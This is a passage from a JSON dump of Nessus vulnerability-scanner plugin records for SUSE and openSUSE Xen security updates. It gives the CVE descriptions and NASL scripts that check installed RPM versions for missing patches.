value:\"p-cpe:/a:novell:suse_linux:11:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-kmp-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-default-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-pae-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-libs-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-tools-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-tools-domU-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-kmp-default-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-libs-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-tools-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-tools-domU-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-doc-html-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-doc-pdf-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-default-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-pae-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-trace-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-libs-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-tools-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-tools-domU-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-doc-html-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-doc-pdf-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-kmp-default-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-kmp-trace-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-libs-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-tools-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-tools-domU-4.0.3_21548_04-0.9.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:18:10", "description": "Three security issues were found in XEN.\n\nTwo security issues are fixed by this update :\n\n - Due to incorrect fault handling in the XEN hypervisor it\n was possible for a XEN guest domain administrator to\n execute code in the XEN host environment.\n (CVE-2012-0217)\n\n - Also a guest user could crash the guest XEN kernel due\n to a protection fault bounce. (CVE-2012-0218)\n\nThe third fix is changing the Xen behaviour on certain hardware :\n\n - The issue is a denial of service issue on older pre-SVM\n AMD CPUs (AMD Erratum 121). (CVE-2012-2934)\n\n AMD Erratum #121 is described in 'Revision Guide for AMD\n Athlon 64 and AMD Opteron Processors':\n http://support.amd.com/us/Processor_TechDocs/25759.pdf\n\n The following 130nm and 90nm (DDR1-only) AMD processors\n are subject to this erratum :\n\no\n\nFirst-generation AMD-Opteron(tm) single and dual core\nprocessors in either 939 or 940 packages :\n\n - AMD Opteron(tm) 100-Series Processors\n\n - AMD Opteron(tm) 200-Series Processors\n\n - AMD Opteron(tm) 800-Series Processors\n\n - AMD Athlon(tm) processors in either 754, 939 or 940\n packages\n\n - AMD Sempron(tm) processor in either 754 or 939 packages\n\n - AMD Turion(tm) Mobile Technology in 754 package This\n issue does not effect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except by\n upgrading your hardware to a newer revision, or not\n allowing untrusted 64bit guestsystems.\n\n The patch changes the behaviour of the host system\n booting, which makes it unable to create guest machines\n until a specific boot option is set.\n\n There is a new XEN boot option 'allow_unsafe' for GRUB\n which allows the host to start guests again.\n\n This is added to /boot/grub/menu.lst in the line looking\n like this :\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... in this example represents the existing boot\n options for the host.", "edition": 19, "published": "2012-06-13T00:00:00", "title": "SuSE 10 Security Update : Xen (ZYPP Patch Number 8180)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2012-06-13T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_XEN-201206-8180.NASL", "href": "https://www.tenable.com/plugins/nessus/59469", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59469);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n\n script_name(english:\"SuSE 10 Security Update : Xen (ZYPP Patch Number 8180)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Three security issues were found in XEN.\n\nTwo security issues are fixed by this update :\n\n - Due to incorrect fault handling in the XEN hypervisor it\n was possible for a XEN guest domain administrator to\n execute code in the XEN host environment.\n (CVE-2012-0217)\n\n - Also a guest user could crash the guest XEN kernel due\n to a protection fault bounce. (CVE-2012-0218)\n\nThe third fix is changing the Xen behaviour on certain hardware :\n\n - The issue is a denial of service issue on older pre-SVM\n AMD CPUs (AMD Erratum 121). (CVE-2012-2934)\n\n AMD Erratum #121 is described in 'Revision Guide for AMD\n Athlon 64 and AMD Opteron Processors':\n http://support.amd.com/us/Processor_TechDocs/25759.pdf\n\n The following 130nm and 90nm (DDR1-only) AMD processors\n are subject to this erratum :\n\no\n\nFirst-generation AMD-Opteron(tm) single and dual core\nprocessors in either 939 or 940 packages :\n\n - AMD Opteron(tm) 100-Series Processors\n\n - AMD Opteron(tm) 200-Series Processors\n\n - AMD Opteron(tm) 800-Series Processors\n\n - AMD Athlon(tm) processors in either 754, 939 or 940\n packages\n\n - AMD Sempron(tm) processor in either 754 or 939 packages\n\n - AMD Turion(tm) Mobile Technology in 754 package This\n issue does not effect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except by\n upgrading your hardware to a newer revision, or not\n allowing untrusted 64bit guestsystems.\n\n The patch changes the behaviour of the host system\n booting, which makes it unable to create guest machines\n until a specific boot option is set.\n\n There is a new XEN boot option 'allow_unsafe' for GRUB\n which allows the host to start guests again.\n\n This is added to /boot/grub/menu.lst in the line looking\n like this :\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... in this example represents the existing boot\n options for the host.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0217.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0218.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2934.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8180.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-devel-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-doc-html-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-doc-pdf-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-doc-ps-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-kmp-default-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-kmp-smp-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-libs-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-tools-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-tools-domU-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-tools-ioemu-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-bigsmp-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"xen-libs-32bit-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-devel-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-doc-html-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-doc-pdf-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-doc-ps-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-kmp-debug-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-kmp-default-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-kmp-kdump-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-kmp-smp-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-libs-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-tools-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-tools-domU-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-tools-ioemu-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-bigsmp-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-kdumppae-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-vmi-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-vmipae-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"xen-libs-32bit-3.2.3_17040_38-0.11.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:25:19", "description": "This update of XEN fixed multiple security flaws that could be\nexploited by local attackers to cause a Denial of Service or\npotentially escalate privileges. Additionally, several other upstream\nchanges were backported.", "edition": 20, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : xen (openSUSE-SU-2012:0886-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:xen-doc-html", "p-cpe:/a:novell:opensuse:xen-devel", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:xen-kmp-desktop", "p-cpe:/a:novell:opensuse:xen-kmp-pae", "p-cpe:/a:novell:opensuse:xen", "p-cpe:/a:novell:opensuse:xen-tools-debuginfo", "p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:xen-doc-pdf", "p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs", "p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs-32bit", "p-cpe:/a:novell:opensuse:xen-debugsource", "p-cpe:/a:novell:opensuse:xen-tools", "p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:xen-tools-domU", "p-cpe:/a:novell:opensuse:xen-kmp-default", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo-32bit"], "id": "OPENSUSE-2012-403.NASL", "href": "https://www.tenable.com/plugins/nessus/74682", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-403.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74682);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n\n script_name(english:\"openSUSE Security Update : xen (openSUSE-SU-2012:0886-1)\");\n script_summary(english:\"Check for the openSUSE-2012-403 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of XEN fixed multiple security flaws that could be\nexploited by local attackers to cause a Denial of Service or\npotentially escalate privileges. Additionally, several other upstream\nchanges were backported.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757537\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=764077\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-07/msg00035.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-debugsource-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-devel-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-default-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-default-debuginfo-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-desktop-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-desktop-debuginfo-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-pae-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-pae-debuginfo-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-libs-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-libs-debuginfo-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-tools-domU-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-tools-domU-debuginfo-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-doc-html-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-doc-pdf-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-32bit-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-tools-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-tools-debuginfo-4.1.2_17-1.10.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:25:19", "description": "This update of XEN fixed multiple security flaws that could be\nexploited by local attackers to cause a Denial of Service or\npotentially escalate privileges. Additionally, several other upstream\nchanges were backported.", "edition": 18, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : xen (openSUSE-2012-404)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": 